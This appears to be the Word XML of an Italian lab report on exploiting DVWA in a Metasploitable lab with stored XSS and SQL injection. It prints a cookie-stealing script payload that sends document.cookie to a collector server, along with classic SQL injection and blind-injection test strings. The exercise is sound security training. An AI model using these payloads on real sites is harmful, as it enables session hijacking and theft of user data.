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33195" w14:textId="4337C28E" w:rsidR="00803792" w:rsidRPr="00803792" w:rsidRDefault="00803792" w:rsidP="00803792">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00803792">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Report sull'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00803792">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Exploitazione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00803792">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> della Vulnerabilità XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00803792">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00803792">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> per il Recupero dei Cookie di Sessione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C43E1EB" w14:textId="77BC7C0C" w:rsidR="003502ED" w:rsidRPr="003502ED" w:rsidRDefault="00803792" w:rsidP="003502ED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00803792">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduzione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476C0DFA" w14:textId="14EFCB01" w:rsidR="003502ED" w:rsidRDefault="003502ED" w:rsidP="003502ED">
      <w:r>
        <w:t xml:space="preserve">In questo report descrivo dettagliatamente il processo seguito per sfruttare diverse vulnerabilità nella </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Damn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Web Application (DVWA), eseguita sulla macchina di laboratorio </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. L'obiettivo primario era di recuperare i cookie di sessione delle vittime tramite </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Cross-Site Scripting (XSS) e di accedere alle password degli utenti sfruttando le vulnerabilità di SQL injection e SQL injection blind. Per facilitare l'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploitazione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> delle vulnerabilità, ho configurato DVWA con il livello di sicurezza impostato su "low".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72902021" w14:textId="63567DF1" w:rsidR="00803792" w:rsidRPr="00803792" w:rsidRDefault="00803792" w:rsidP="00803792">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00803792">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configurazione del Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D77F8" w14:textId="47573EA6" w:rsidR="00803792" w:rsidRDefault="00803792" w:rsidP="00803792">
      <w:r>
        <w:t>Ho iniziato configurando un server web locale utilizzando Node.js e il framework Express. Questo server aveva il compito di intercettare e registrare i cookie inviati dalle vittime del sito DVWA vulnerabile a XSS. Il codice del server è il seguente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516020D0" w14:textId="77777777" w:rsidR="00803792" w:rsidRDefault="00803792" w:rsidP="00803792"/>
    <w:p w14:paraId="5BE693AA" w14:textId="06C789A8" w:rsidR="00803792" w:rsidRDefault="00B5387D" w:rsidP="00803792">
      <w:r w:rsidRPr="00B5387D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FF8A9C7" wp14:editId="5BC65FCE">
            <wp:extent cx="5731510" cy="2163445"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="564529582" name="Immagine 1" descr="Immagine che contiene testo, schermata, Software multimedial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29582" name="Immagine 1" descr="Immagine che contiene testo, schermata, Software multimediale, software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CD08" w14:textId="77777777" w:rsidR="00803792" w:rsidRDefault="00803792" w:rsidP="00803792">
      <w:r>
        <w:t>Questo semplice script ascolta sulla porta 3000 e scrive i cookie ricevuti in un file di testo per l'analisi successiva.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB57171" w14:textId="77777777" w:rsidR="00803792" w:rsidRDefault="00803792" w:rsidP="00803792"/>
    <w:p w14:paraId="031FEB38" w14:textId="77777777" w:rsidR="00B5387D" w:rsidRDefault="00B5387D" w:rsidP="00803792"/>
    <w:p w14:paraId="6A97E170" w14:textId="77777777" w:rsidR="00B5387D" w:rsidRDefault="00B5387D" w:rsidP="00803792"/>
    <w:p w14:paraId="109D5E0F" w14:textId="77777777" w:rsidR="00B5387D" w:rsidRDefault="00B5387D" w:rsidP="00803792"/>
    <w:p w14:paraId="15F24880" w14:textId="77777777" w:rsidR="00474BA4" w:rsidRDefault="00474BA4" w:rsidP="00803792">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48245FE5" w14:textId="77777777" w:rsidR="003502ED" w:rsidRDefault="003502ED" w:rsidP="00803792">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D19A3DE" w14:textId="77777777" w:rsidR="00273CA5" w:rsidRDefault="00273CA5" w:rsidP="00803792">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DCDC51B" w14:textId="19B05781" w:rsidR="00803792" w:rsidRPr="00B5387D" w:rsidRDefault="00803792" w:rsidP="00803792">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5387D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modifica della Lunghezza dei Caratteri in DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F7A78" w14:textId="77777777" w:rsidR="00803792" w:rsidRDefault="00803792" w:rsidP="00803792">
      <w:r>
        <w:t>Successivamente, ho modificato la lunghezza massima dei caratteri per il campo del messaggio in DVWA per permettermi di inserire payload XSS più lunghi e sofisticati. Ho aumentato il limite di caratteri direttamente nel codice sorgente HTML della pagina vulnerabile a XSS, assicurandomi che il mio script fosse in grado di essere iniettato e eseguito senza restrizioni.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DD5584" w14:textId="0BCC35A7" w:rsidR="00474BA4" w:rsidRDefault="00474BA4" w:rsidP="00803792">
      <w:r w:rsidRPr="00474BA4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34330EA0" wp14:editId="6B79F6D7">
            <wp:extent cx="4084674" cy="4610500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="829161460" name="Immagine 1" descr="Immagine che contiene testo, elettronica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61460" name="Immagine 1" descr="Immagine che contiene testo, elettronica, schermata, softwa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2961" w14:textId="77777777" w:rsidR="00803792" w:rsidRDefault="00803792" w:rsidP="00803792"/>
    <w:p w14:paraId="12725BA3" w14:textId="1FFC2BB2" w:rsidR="00803792" w:rsidRPr="00F12814" w:rsidRDefault="00803792" w:rsidP="00803792">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12814">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Creazione e Inserimento del Payload XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4832372F" w14:textId="2827C72B" w:rsidR="00803792" w:rsidRDefault="00803792" w:rsidP="00803792">
      <w:r>
        <w:t xml:space="preserve">Il payload XSS che ho creato è stato pensato per eseguire una </w:t>
      </w:r>
      <w:r w:rsidR="00F12814">
        <w:t>re</w:t>
      </w:r>
      <w:r w:rsidR="00474BA4">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00F12814">
        <w:t>direzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> invisibile dei cookie della sessione al mio server. Il payload era il seguente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497BDE0A" w14:textId="77777777" w:rsidR="00803792" w:rsidRDefault="00803792" w:rsidP="00803792"/>
    <w:p w14:paraId="300208EA" w14:textId="60128321" w:rsidR="00803792" w:rsidRDefault="00F12814" w:rsidP="00803792">
      <w:r>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591CC655" w14:textId="77777777" w:rsidR="00803792" w:rsidRDefault="00803792" w:rsidP="00803792">
      <w:r>
        <w:t xml:space="preserve">&lt;script&gt;document.location='http://localhost:3000/collect?cookie=' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encodeURIComponent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF1961A" w14:textId="6A948E84" w:rsidR="00803792" w:rsidRDefault="00F12814" w:rsidP="00803792">
      <w:r>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66898FF9" w14:textId="77777777" w:rsidR="00803792" w:rsidRDefault="00803792" w:rsidP="00803792">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ho inserito questo script nel campo "Message" del guestbook di DVWA, salvando così il payload nella pagina, pronta per essere eseguita da qualsiasi visitatore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AADE86" w14:textId="316C1BE3" w:rsidR="00803792" w:rsidRPr="00F12814" w:rsidRDefault="00803792" w:rsidP="00803792">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12814">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test e Verifica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772795A4" w14:textId="77777777" w:rsidR="00803792" w:rsidRDefault="00803792" w:rsidP="00803792">
      <w:r>
        <w:t>Dopo aver inserito il payload, ho testato la sua efficacia accedendo a DVWA da un altro browser per simulare l'accesso di una vittima. Come previsto, il browser ha eseguito lo script salvato, inviando i cookie di sessione al mio server, dove sono stati registrati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324B01DD" w14:textId="37C67DA6" w:rsidR="00F12814" w:rsidRDefault="00F12814" w:rsidP="00803792">
      <w:r w:rsidRPr="00F12814">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54CF24CB" wp14:editId="7C145DC2">
            <wp:extent cx="5731510" cy="3077155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="689142386" name="Immagine 1" descr="Immagine che contiene schermata, software, computer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42386" name="Immagine 1" descr="Immagine che contiene schermata, software, computer, Software multimediale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763" cy="308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A20C" w14:textId="1C1D2FBB" w:rsidR="00803792" w:rsidRPr="00F12814" w:rsidRDefault="00F12814" w:rsidP="00803792">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12814">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26BCD04F" wp14:editId="2D65E559">
            <wp:extent cx="5731510" cy="836295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1887822997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22997" name="Immagine 1" descr="Immagine che contiene testo, schermata, Caratte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70A6" w14:textId="7BB0523B" w:rsidR="000F4726" w:rsidRPr="000F4726" w:rsidRDefault="000F4726" w:rsidP="000F4726">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F4726">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spiegazione dei Cookie Catturati</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBEABE0" w14:textId="39C36C7A" w:rsidR="000F4726" w:rsidRPr="000F4726" w:rsidRDefault="000F4726" w:rsidP="000F4726">
      <w:r w:rsidRPr="000F4726">
        <w:t>1. security=low: Questo valore del cookie indica che il livello di sicurezza dell'applicazione DVWA (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F4726">
        <w:t>Damn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F4726">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F4726">
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F4726">
        <w:t xml:space="preserve"> Web Application) è stato impostato su "low". Questo è un'impostazione intenzionale che riduce le misure di protezione per permettere l'analisi e l'apprendimento delle tecniche di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F4726">
        <w:t>exploitazione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F4726">
        <w:t xml:space="preserve"> delle vulnerabilità.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DF0A2B" w14:textId="77777777" w:rsidR="000F4726" w:rsidRPr="000F4726" w:rsidRDefault="000F4726" w:rsidP="000F4726">
      <w:r w:rsidRPr="000F4726">
        <w:t>2. **PHPSESSID**: Questo è il PHP Session ID, che rappresenta un identificativo unico per la sessione dell'utente corrente. Questo cookie è fondamentale perché mantiene lo stato della sessione tra le richieste HTTP, permettendo all'applicazione di identificare le richieste consecutive provenienti dallo stesso utente. L'accesso a questo cookie da parte di un attaccante potrebbe permettere l'impersonificazione dell'utente, dando la possibilità di agire nell'applicazione come se fosse l'utente legittimo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2851D807" w14:textId="77777777" w:rsidR="000F4726" w:rsidRDefault="000F4726" w:rsidP="00803792">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB5B2C5" w14:textId="364FA3F6" w:rsidR="00F12814" w:rsidRPr="0097056D" w:rsidRDefault="00F12814" w:rsidP="00803792">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097056D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0317C491" w14:textId="6B41DAAB" w:rsidR="0097056D" w:rsidRPr="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097056D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Esecuzione di un SQL Injection Semplice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DCB2F9" w14:textId="77777777" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACAD6CF" w14:textId="2BC525EA" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>1. Interazione con il campo "User ID" della vulnerabilità SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629F9BEA" w14:textId="6358AB00" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Ho inserito i</w:t>
      </w:r>
      <w:r w:rsidR="00474BA4">
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> seguent</w:t>
      </w:r>
      <w:r w:rsidR="00474BA4">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload per verificare la presenza della vulnerabilità:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D3C3F" w14:textId="7BE246B1" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026D075F" w14:textId="77777777" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     1' OR '1'='1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC069C1" w14:textId="6BCFCAAE" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA5EB55" w14:textId="77777777" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Questo ha mostrato tutti gli utenti presenti nel database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A4AF68" w14:textId="77777777" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="00803792"/>
    <w:p w14:paraId="47EFE9CF" w14:textId="42F94D5D" w:rsidR="00F12814" w:rsidRDefault="00F12814" w:rsidP="00803792">
      <w:r w:rsidRPr="00F12814">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7119AF97" wp14:editId="44FFCC7D">
            <wp:extent cx="4884420" cy="2019631"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111597574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7574" name="Immagine 1" descr="Immagine che contiene testo, schermata, Carattere, numer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351" cy="202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1AB4" w14:textId="77777777" w:rsidR="00803792" w:rsidRDefault="00803792" w:rsidP="00803792"/>
    <w:p w14:paraId="17059F28" w14:textId="08F75642" w:rsidR="00F12814" w:rsidRPr="00474BA4" w:rsidRDefault="00F12814" w:rsidP="00803792">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00474BA4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SQL INJECTION (BLIND)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC5CFA0" w14:textId="4E2C0C80" w:rsidR="0097056D" w:rsidRPr="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097056D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Esecuzione di un SQL Injection Blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBAF3B3" w14:textId="77777777" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2416A1" w14:textId="0FE85495" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>1. Interazione con il campo "User ID" della vulnerabilità SQL Injection Blind:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49852163" w14:textId="77777777" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Ho inserito i seguenti payload per verificare la presenza della vulnerabilità:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135EB965" w14:textId="51F20662" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FB16C8" w14:textId="77777777" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     1' AND 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A5CE3F" w14:textId="2EF43BAA" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE62DB0" w14:textId="77777777" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Questo ha confermato la presenza dell'utente con ID 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E76D1B" w14:textId="5A662320" w:rsidR="00474BA4" w:rsidRDefault="00474BA4" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00F12814">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B5E7485" wp14:editId="11A8C964">
            <wp:extent cx="5075360" cy="1524132"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="234609317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09317" name="Immagine 1" descr="Immagine che contiene testo, schermata, Carattere, line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9ADF" w14:textId="77777777" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Ho inserito il seguente payload per verificare l'assenza dell'utente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18092013" w14:textId="7D13EA85" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3120422F" w14:textId="77777777" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     1' AND 1=2--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D97D147" w14:textId="2FC281D4" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04079304" w14:textId="319FBA4D" w:rsidR="00474BA4" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Questo non ha restituito alcun risultato, confermando la vulnerabilità SQL Injection Blind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC2EE33" w14:textId="331C2891" w:rsidR="0097056D" w:rsidRPr="00273CA5" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47B0D044" w14:textId="1CCD89A0" w:rsidR="0097056D" w:rsidRDefault="00474BA4" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00474BA4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="142578D3" wp14:editId="10918EB7">
            <wp:extent cx="5044877" cy="1165961"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1562514264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14264" name="Immagine 1" descr="Immagine che contiene testo, schermata, Carattere, line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DCF0" w14:textId="77777777" w:rsidR="0097056D" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4EA55A" w14:textId="3A54A61B" w:rsidR="0097056D" w:rsidRPr="00474BA4" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00474BA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD3765C" w14:textId="402A3016" w:rsidR="0097056D" w:rsidRPr="00F12814" w:rsidRDefault="0097056D" w:rsidP="0097056D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1377"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'attacco XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> è stato eseguito con successo, catturando i cookie di sessione delle vittime e inviandoli a un server controllato dall'attaccante. Inoltre, sono stati eseguiti con successo gli attacchi SQL Injection e SQL Injection Blind, confermando la presenza di queste vulnerabilità nell'applicazione DVWA.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0097056D" w:rsidRPr="00F12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92"/>
    <w:rsid w:val="000F4726"/>
    <w:rsid w:val="00273CA5"/>
    <w:rsid w:val="003502ED"/>
    <w:rsid w:val="00385E7A"/>
    <w:rsid w:val="00474BA4"/>
    <w:rsid w:val="00803792"/>
    <w:rsid w:val="0097056D"/>
    <w:rsid w:val="00B5387D"/>
    <w:rsid w:val="00DE3799"/>
    <w:rsid w:val="00F1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1EEB5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId 